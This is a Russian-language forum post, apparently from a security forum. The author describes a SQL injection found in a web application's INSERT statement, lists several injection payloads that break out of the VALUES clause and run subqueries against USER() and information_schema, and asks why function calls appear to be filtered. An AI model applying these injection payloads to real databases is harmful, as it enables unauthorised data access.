Показать сообщение отдельно
Старый 13.11.2019, 16:28   #1
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 153
Репутация: 25
По умолчанию Странная SQLi в INSERT

Нашёл простейшую SQLi в INSERT типа такого:
Цитата:
INSERT INTO table (col1, col2, col3) VALUES('a', '[INJ_HERE]', 'c')
Беру такой пейлод:
Цитата:
', 'sometext'); --
Запись с "sometext" отлично добавляется в базу и её видно в веб-морде.
Аналогично
Цитата:
', (SELECT 'sometext')); --
Однако пейлоды с функциями и табличками внутри не работают (вывода ошибок нет)
Цитата:
', (SELECT USER())); --
Цитата:
', (SELECT COUNT(*) FROM inforation_schema.TABLES)); --
Работает вот так:
Цитата:
', (SELECT COUNT(*) FROM (SELECT 1)a)); --
Подумал что вырезаются функции стандартные типа USER(), VERSION(), DATABASE(). Однако если их заключить в кавычки, то ничего не режется:
Цитата:
', (SELECT 'USER()')); --
Пробовал и простые типа CURTIME() - та же история.

В чём может быть причина? Ни разу такого поведения не встречал.
Белый Тигр вне форума   Ответить с цитированием